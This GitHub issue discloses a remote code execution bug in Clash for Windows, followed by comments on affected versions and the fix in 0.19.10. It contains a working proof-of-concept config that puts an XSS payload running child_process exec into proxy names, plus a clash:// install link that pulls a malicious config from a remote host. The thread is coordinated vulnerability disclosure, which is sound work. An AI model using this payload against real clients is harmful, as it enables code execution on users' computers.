Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Bug]: Remote Code Execution/远程代码执行 #2710

Closed
Anthem-whisper opened this issue Feb 23, 2022 · 30 comments
Closed

[Bug]: Remote Code Execution/远程代码执行 #2710

Anthem-whisper opened this issue Feb 23, 2022 · 30 comments
Labels

Comments

@Anthem-whisper
Copy link

Anthem-whisper commented Feb 23, 2022

Clash For Windows Remote Code Execution

Description

Clash For Windows is powered by Electron. If a XSS payload is in the name of proxies, we can remotely execute any JavaScript code on the victim's computer.

image-20220223145225445

Affected versions of clash_for_windows_pkg

version: 0.19.8 (there are other vulnerability triggers in version 0.19.9, it's exactly 0.19.9)

Platform: Windows

OS specifics: Windows 10

PoC

  1. Import the following clash config file:
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

  1. Switch to it in "Profiles"

  2. Click "Proxies" column (Sometimes it's not necessary.)

    image-20220223152427836

    Attention:

    • You need to make sure that the payload is displayed in the Proxies column.
    • Exploit is theoretically stable, but sometimes you may need to restart the clash_for_windows_pkg and reproduce the vulnerability

A way to Exploit

put the evil config file to internets and use clash:// to install it, clash_for_windows_pkg will download and switch to it automaticlly .

such as:

clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE
@Anthem-whisper
Copy link
Author

Anthem-whisper commented Feb 23, 2022

我已经向作者的iCloud邮箱发送了一封带了PoC的邮件
I have sent an email with the PoC to the author's iCloud mailbox

@Fndroid
Copy link
Owner

Fndroid commented Feb 24, 2022

非常感谢,下个版本修复

@Fndroid
Copy link
Owner

Fndroid commented Feb 25, 2022

fixed or implement in latest release, check it out from https://github.com/Fndroid/clash_for_windows_pkg/releases

@Anthem-whisper
Copy link
Author

okay, I'll make it public now

@DragonQuestHero
Copy link

@Anthem-whisper 低于0.19.8是否受到影响?

@Pain4ever
Copy link

Electron框架写代码不开沙盒的屑 (doge

@yi-Xu-0100
Copy link
Contributor

yi-Xu-0100 commented Feb 25, 2022

应该只有 0.19.8 受影响,这个版本才引入的。
重新验证了下,0.19.5 是可以复现调用计算器的。

@peanut996
Copy link

peanut996 commented Feb 25, 2022

围观 👀

@DragonQuestHero
Copy link

锤子 低版本都受影响 机场直接变鸡场 乱杀 我查毒去了...

@54208039
Copy link

吃瓜群众

@kjcxmx
Copy link

kjcxmx commented Feb 25, 2022

right

@Fndroid
Copy link
Owner

Fndroid commented Feb 25, 2022

Electron框架写代码不开沙盒的屑 (doge

这xss和开不开沙盒有关么你看来,不开沙盒就是垃圾是吗?

@kotori2
Copy link

kotori2 commented Feb 25, 2022

Electron框架写代码不开沙盒的屑 (doge

这xss和开不开沙盒有关么你看来,不开沙盒就是垃圾是吗?

https://www.electronjs.org/zh/docs/latest/tutorial/sandbox

……因此,我们建议在大多数非常谨慎的情况下启用渲染器沙盒化。

@LztCode
Copy link

LztCode commented Feb 25, 2022

测试了0.14和0.18都受到影响,有没有强制更新措施啊

@3wh1te
Copy link

3wh1te commented Feb 25, 2022

3. Click "Proxies" column (Sometimes it's not necessary.)

0.18.8也可以复现

@wjl110
Copy link

wjl110 commented Feb 25, 2022

谢谢楼主

@751897386
Copy link

0.19.2也可以(

@GrayXu
Copy link

GrayXu commented Feb 25, 2022

希望可以发布一个影响范围(版本号范围?)的说明

@Anthem-whisper
Copy link
Author

希望可以发布一个影响范围(版本号范围?)的说明

poc里面不是说了吗,小于等于0.19.8都受影响
其他平台因为没有设备就没有测试

@ccint3cc
Copy link

更新至0.19.10,测试不受影响

@ccint3cc
Copy link

0.19.8,poc测试成功。
1fa7480456b7a913f682d8001ba497c

@GrayXu
Copy link

GrayXu commented Feb 25, 2022

希望可以发布一个影响范围(版本号范围?)的说明

poc里面不是说了吗,小于等于0.19.8都受影响 其他平台因为没有设备就没有测试

感谢

@Anthem-whisper
Copy link
Author

希望可以发布一个影响范围(版本号范围?)的说明

poc里面不是说了吗,小于等于0.19.8都受影响 其他平台因为没有设备就没有测试

感谢

更正一下,0.19.9版本并没有完全修复,请更新到0.19.10

@crazyMarky
Copy link

感谢,已升级最新版

@yu-steven
Copy link

在现场,贴贴

@ahackingboy
Copy link

还好我情报工作OK

@malviez
Copy link

malviez commented Mar 3, 2022

感谢,已升级最新版,贴贴

@ajfg93
Copy link

ajfg93 commented Mar 7, 2022

还在使用 0.11.3 版本 :)

@KonDream
Copy link

KonDream commented Mar 7, 2022

0.19.11

@cxwx
Copy link

cxwx commented Aug 14, 2022

所以订阅这种就很不靠谱,本质问题没有解决。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests